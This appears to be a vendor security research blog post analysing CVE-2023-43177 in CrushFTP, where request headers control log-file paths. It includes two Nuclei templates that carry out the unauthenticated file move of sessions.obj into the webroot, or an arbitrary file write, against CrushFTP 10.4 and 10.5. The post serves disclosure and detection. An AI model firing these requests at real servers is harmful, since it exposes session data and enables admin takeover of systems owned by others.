4 min read
CrushFTP - CVE-2023-43177 Unauthenticated Remote Code Execution
CVE-2023-43177 is a critical vulnerability in CrushFTP. The vulnerability could potentially allow unauthenticated attackers with network access to the CrushFTP Instance to write files in the local file system and eventually in some versions could allow the executing of arbitrary system commands.
Technical Details
Based on the information shared in the original blog post at https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/, we embarked on an effort to gain a deeper understanding of the vulnerability. In the CrushFTP application, a default behaviour exists where it issues an anonymous authenticated session cookie when a request is made. Consequently, this results in a blurred distinction between an authenticated user and an unauthenticated user.
The application's logic functions in the following manner: when the request includes the as2-to
header, the keys within the user_info
session object are sourced from user input, specifically from the request headers. Subsequently, at the conclusion of request processing, a function call to drain_log()
is executed, which logs the request's details, including specific request headers, in the log files, along with other pertinent information.
Interestingly, the locations where the log entries are written are determined by specific keys within the "user_info" session object. Because these keys can be supplied via the request header, owing to the existence of the "as2-to" header, it becomes possible for an attacker to potentially gain control over the location or even the log file itself.
These are the headers responsible for altering the logic of logs writing:
- user_log_path - The directory from where the file needs to be moved (moved because the file will be deleted if successfully moved).
- user_log_file - The filename that gets moved.
- user_log_path_custom - The new location where logs should be written.
- dont_log - If not set to "true", doesn't log (append) anything in the file.
In other words, this means that we have the capability to copy any file from the filesystem to the webroot; however, it's important to note that the file will be removed from its original location. Within the application directory, there exists a vital file named "sessions.obj" which houses essential details about currently active sessions. Interestingly, this file is automatically recreated if it is deleted. Therefore, it represents the perfect target for exploiting this vulnerability, as gaining access to "sessions.obj" would potentially grant an attacker admin privileges to the CrushFTP instance.
Nuclei template to detect CVE-2023-43177 on CrushFTP 10.5
yaml
1id: CVE-2023-43177
2
3info:
4 name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
5 author: iamnoooob,rootxharsh,pdresearch
6 severity: critical
7 description: |
8 CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
9 reference:
10 - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
11 - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
12 - https://blog.projectdiscovery.io/crushftp-rce/
13 classification:
14 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15 cvss-score: 9.8
16 cve-id: CVE-2023-43177
17 cwe-id: CWE-913
18 epss-score: 0.00106
19 epss-percentile: 0.42673
20 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
21 metadata:
22 max-request: 3
23 vendor: crushftp
24 product: crushftp
25 tags: cve,cve2023,crushftp,unauth,rce
26
27flow: http(1) && http(2) && http(3)
28
29variables:
30 dirname: "{{randbase(8)}}"
31
32http:
33 - method: GET
34 path:
35 - "{{BaseURL}}/WebInterface"
36
37 matchers:
38 - type: dsl
39 dsl:
40 - contains_all(to_lower(header), "currentauth", "crushauth")
41
42 - method: POST
43 path:
44 - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
45 headers:
46 Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
47 as2-to: X
48 user_name: crushadmin{{randstr}}
49 user_log_path: "./"
50 user_log_path_custom: "./WebInterface/{{dirname}}/"
51 user_log_file: sessions.obj
52 dont_log: true
53 Content-Type: application/x-www-form-urlencoded
54 body: |
55 post=body
56
57 - method: GET
58 path:
59 - "{{BaseURL}}/WebInterface/{{dirname}}/sessions.obj"
60
61 max-size: 5000
62 matchers:
63 - type: dsl
64 dsl:
65 - status_code == 200
66 - contains(header, 'application/binary')
67 - contains_any(to_lower(header), 'webinterface', 'crushftp')
68 condition: and
69
70 extractors:
71 - type: dsl
72 dsl:
73 - content_length
However, we observed that in our specific version, this exploit didn't perform as anticipated. Following the usual process of decompiling and debugging, we uncovered a crucial distinction. In versions before approximately 10.4, the logic did not incorporate "user_log_path_custom" in the log-writing workflow. Instead, the mechanism in place involves the creation of a specified directory or file and logging the request into it, rather than simply copying a file. Consequently, while this approach provides a file write primitive anywhere in the system, it doesn't afford complete control over the content. As a result, it appears that exploiting it for remote code execution may not be feasible, or at least, not based on our current understanding.
Nuclei template to detect CVE-2023-43177 on <= CrushFTP 10.4
yaml
1id: CVE-2023-43177
2
3info:
4 name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
5 author: iamnoooob,rootxharsh,pdresearch
6 severity: critical
7 description: |
8 CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
9 reference:
10 - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
11 - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
12 - https://blog.projectdiscovery.io/crushftp-rce/
13 classification:
14 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
15 cvss-score: 9.8
16 cve-id: CVE-2023-43177
17 cwe-id: CWE-913
18 epss-score: 0.00106
19 epss-percentile: 0.42673
20 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
21 metadata:
22 max-request: 3
23 vendor: crushftp
24 product: crushftp
25 tags: cve,cve2023,crushftp,unauth,rce
26
27flow: http(1) && http(2) && http(3)
28
29variables:
30 dirname: "{{randbase(5)}}"
31 filename: "{{randbase(5)}}"
32
33http:
34 - method: GET
35 path:
36 - "{{BaseURL}}/WebInterface"
37
38 matchers:
39 - type: dsl
40 dsl:
41 - contains_all(to_lower(header), "currentauth", "crushauth")
42
43 - method: POST
44 path:
45 - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
46
47 headers:
48 Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
49 as2-to: X
50 user_name: crushadmin{{dirname}}
51 user_log_path: "./WebInterface/{{dirname}}/"
52 user_log_file: "{{filename}}"
53 Content-Type: application/x-www-form-urlencoded
54
55 body: |
56 post=body
57
58 matchers:
59 - type: regex
60 regex:
61 - "crushadmin"
62
63 - method: GET
64 path:
65 - "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
66
67 matchers:
68 - type: dsl
69 dsl:
70 - status_code == 200
71 - contains(body, "crushadmin{{dirname}}")
72 condition: and
By embracing Nuclei and participating in the open-source community or joining the ProjectDiscovery Cloud Platform, organizations can strengthen their security defenses, stay ahead of emerging threats, and create a safer digital environment. Security is a collective effort, and together we can continuously evolve and tackle the challenges posed by cyber threats.
- Rahul Maini, Harsh Jaiswal @ ProjectDiscovery Research